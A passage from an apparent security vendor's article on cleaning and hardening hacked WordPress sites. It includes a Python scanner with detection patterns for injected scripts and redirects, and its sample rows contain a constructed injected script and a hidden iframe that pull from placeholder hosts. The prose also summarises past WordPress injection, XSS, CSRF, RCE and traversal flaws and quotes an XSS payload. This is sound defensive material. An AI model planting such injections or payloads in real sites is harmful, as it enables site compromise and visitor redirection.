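"""Report injected scripts and redirects in WordPress database content.

Added example, not part of the original article. Given HTML from
wp_posts.post_content or a wp_options value, it flags <script>/<iframe>
tags loading from hosts outside an allowlist, plus the two inline
techniques in the redirection sample above: a dynamically created script
with a remote src, and a forced window.location redirect.
ALLOWED_HOSTS and SAMPLE_ROWS (placeholder .example domains) are assumptions.
"""
import re
from urllib.parse import urlparse

# Hosts your site legitimately loads from (assumed for this example).
ALLOWED_HOSTS = {"www.example.com"}

TAG_SRC = re.compile(r"<(script|iframe)\b[^>]*\bsrc\s*=\s*['\"]([^'\"]+)['\"]", re.I)
INLINE_SCRIPT = re.compile(r"<script\b[^>]*>(.*?)</script>", re.I | re.S)
INLINE_PATTERNS = {
    # s.src='//host/tag.min.js' after document.createElement('script')
    "dynamic script load": re.compile(r"\.src\s*=\s*['\"]([^'\"]+)['\"]"),
    # window.location.replace("//host/..."), .assign("..."), .href = "..."
    "forced redirect": re.compile(
        r"location\.(?:replace|assign|href)\s*[(=]\s*['\"]([^'\"]+)['\"]"),
}


def host_of(url):
    """Host part of an absolute or protocol-relative URL; '' for relative paths."""
    if url.startswith("//"):
        url = "https:" + url
    return (urlparse(url).hostname or "").lower()


def scan_html(html):
    """Return [(indicator, host)] for every external reference not in ALLOWED_HOSTS."""
    findings = []
    for tag, src in TAG_SRC.findall(html):
        host = host_of(src)
        if host and host not in ALLOWED_HOSTS:
            findings.append((f"external <{tag.lower()}> src", host))
    for body in INLINE_SCRIPT.findall(html):
        for name, rx in INLINE_PATTERNS.items():
            for url in rx.findall(body):
                host = host_of(url)
                if host and host not in ALLOWED_HOSTS:
                    findings.append((name, host))
    return findings


def scan_rows(rows):
    """rows: iterable of (table, row_id, html); returns [(table, row_id, indicator, host)]."""
    report = []
    for table, row_id, html in rows:
        for indicator, host in scan_html(html):
            report.append((table, row_id, indicator, host))
    return report


# Constructed rows standing in for a SELECT over wp_posts/wp_options; the
# domains are placeholders, not real indicators.
SAMPLE_ROWS = [
    ("wp_posts", 12,
     "<p>Hello world</p><script src='//www.example.com/js/app.js'></script>"),
    ("wp_options", 7,
     "<script>const s=document.createElement('script');"
     "s.src='//cdn-bad.example/tag.min.js';"
     "s.onload=()=>{window.location.replace(\"//redir-bad.example/afu.php?z=1\")};"
     "document.head.appendChild(s);</script>"),
    ("wp_posts", 13,
     "<iframe src=\"https://frame-bad.example/x\" width=0 height=0></iframe>"),
]

if __name__ == "__main__":
    for table, row_id, indicator, host in scan_rows(SAMPLE_ROWS):
        print(f"{table} id={row_id}: {indicator} -> {host}")
```

Feed it the post_content and option_value columns exported from phpMyAdmin, and add your own domain and any CDN you use to ALLOWED_HOSTS before trusting an empty result.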

10. Reinstall

If the site is heavily infected, it’s better to delete the files and replace them with fresh copies.

That said, reinstalling is not limited to the files; after the cleanup, make sure to reinstall each plugin. Sometimes, due to lack of time or vigilance, we tend to keep defunct plugins. A hacker benefits from these plugins, as they almost always have exploitable vulnerabilities.

Some WordPress site owners believe that deleting the whole website and starting from scratch is a more viable option.

Well, it’s not.

It doesn’t matter whether you build a new website: if you do not follow security practices, things can always go wrong.

How do hackers attack WordPress websites?

1. WordPress SQL Injection

WordPress version 4.8.3 and previous ones were found vulnerable to SQL injection attacks. Quite ironically, the $wpdb->prepare() method, which is generally used to prepare safe queries, was itself vulnerable this time. This meant that plugins and themes using queries created with this function were also potentially vulnerable to an SQLi attack.

Similarly, the WP Statistics plugin for WordPress, with more than 3,00,000 downloads, was vulnerable to SQLi. Typically, an attacker can read sensitive tables like wp_users of your WordPress site using SQLi. Although the passwords are stored in encrypted format, tools can still be used for decryption. This means obtaining admin credentials to log into an admin’s account in WordPress. In the worst-case scenario, the attacker can even upload a reverse shell via SQLi, leading to a hacked WordPress site.

Related Article – Prevent SQL Injection in WordPress

2. WordPress Cross-Site Scripting

WordPress version 5.1.1 and previous ones were found vulnerable to XSS, CSRF and RCE vulnerabilities. This was a stored XSS vulnerability. The wp_filter_kses() function, which is used to sanitize comments, allows basic HTML tags and attributes, like the <a> tag combined with the ‘href‘ attribute. Therefore, attackers could deliver a malicious payload like <a title=’XSS ” onmouseover=evilCode() id=” ‘>. This would get stored in the database and run every time a user visits the page.

Related Blog – Cross- Site Scripting in WordPress – Examples

3. WordPress Cross-Site Request Forgery

A CSRF validation token has not been implemented for WordPress comments, and rightly so, because it would hinder WordPress’s trackback and pingback features. To differentiate normal users from admins, WordPress uses an extra nonce for admin validation in the comment forms.

So, if the correct nonce is provided, the comment is created without sanitization, and if the nonce is incorrect, the comment is created with sanitization. When an administrator fails to provide the nonce, the comment is sanitized using wp_filter_post_kses() instead of wp_filter_kses(). The wp_filter_post_kses() function allows far more HTML tags and attributes than should be permissible, which lets an attacker create such comments through a CSRF attack.

4. WordPress Remote Code Execution

WordPress versions before 4.9.9 and 5.x before 5.0.1 were found prone to RCE. The vulnerable parameter was the Post Meta entry handled by the _wp_attached_file() function. This parameter could be manipulated into a string of the attacker’s choice, i.e. one ending with a .jpg?file.php substring.

However, to exploit this, the attacker needed author privileges. An attacker with author privileges could upload a specially crafted image containing the PHP code to be executed, embedded in its Exif metadata. Scripts to exploit this vulnerability are publicly available, and a Metasploit module has been released too!

5. WordPress Directory Traversal

WordPress 5.0.3 was vulnerable to path traversal attacks. To exploit this, the attacker needed at least author privileges on the target WordPress site. The vulnerable component was the function wp_crop_image().

So, a user running this function (i.e. one able to crop an image) could write the output image to an arbitrary directory. Moreover, the file name could be appended with the directory-up sequence ‘../‘ to reach the path of the file an attacker wishes to obtain, i.e. .jpg?/../../file.jpg. Exploits and Metasploit modules replicating this vulnerability are available online!

6. Buggy Plugins or Themes

It is also likely that a poorly coded plugin is responsible for WordPress getting hacked. Themes by non-reputed authors often contain buggy code. In some cases, attackers themselves release malware-laden plugins and themes to compromise numerous sites. Also, outdated WordPress software can make the site vulnerable, leading to it being hacked.

Need professional help to prevent your WordPress site from being hacked? Drop us a message on the chat widget, and we’d be happy to help you. Fix my hacked WordPress website now.

Fixing Hacked WordPress Website

1. Secure Practices

  • Avoid using common or default passwords. Make sure the WordPress login requires a secure and random password.
  • Remove folders of old WordPress installation from the site as they can leak sensitive info.
  • Do not use nulled themes or plugins from unreputed authors. Keep the existing plugins and themes up to date with the latest patches.
  • Use subnetting while sharing the WordPress hosting space with other sites.
  • Make sure no sensitive ports are open on the internet.
  • Disable directory indexing for sensitive WordPress files using .htaccess.
  • Restrict IPs based on countries from where you detect heavy bot traffic on site.
  • Follow secure coding practices if you are a developer for WordPress.
  • Use SSL for your WordPress site.
  • Always keep a backup of your WordPress site separately.
  • Rename the wp-login.php into a unique slug.
  • Use two-factor authentication to log into your WordPress site.

2. Use a Security Solution

A firewall can help in securing your WordPress site even if it is vulnerable. However, finding the correct firewall for the diverse needs of WordPress can be tricky. Astra can help you make the right choice from its three plans: Essential, Pro and Business. Whether you use WordPress to run a small blog or a corporate site, Astra covers every ground for you. Moreover, the Astra security solution scans and patches your vulnerable WordPress site automatically. Just install the Astra plugin and your site is secure again.

Try a demo now!

3. Security Audit and Pentesting

As seen in this article, vulnerabilities in WordPress arise from time to time. Therefore, as a precautionary measure, it is advisable to conduct penetration testing of your website. This will reveal the loopholes to you before attackers can catch up with your site’s security. Astra provides a comprehensive security audit of the complete WordPress site. With its 120+ active tests, Astra gives you the right mix of automated and manual testing.



About The Author

Ananda Krishna

Ananda Krishna is the co-founder & CTO of Astra Security, a SaaS suite that secures businesses from cyber threats. He has been acknowledged by the Indian Navy, Microsoft, United Airlines, etc. for finding critical security vulnerabilities in their systems. Winner of the Best Security Product at Global Conference on Cyberspace 2017 (awarded by Narendra Modi, Prime Minister of India) & French Tech Ticket, Paris (awarded by François Hollande, former President of France). At Astra he's building an intelligent security ecosystem - web application firewall (WAF), malware detection & analysis, large scale SaaS applications, APIs & more. He's actively involved in the cyber security community and shared his knowledge at various forums & invited talks.
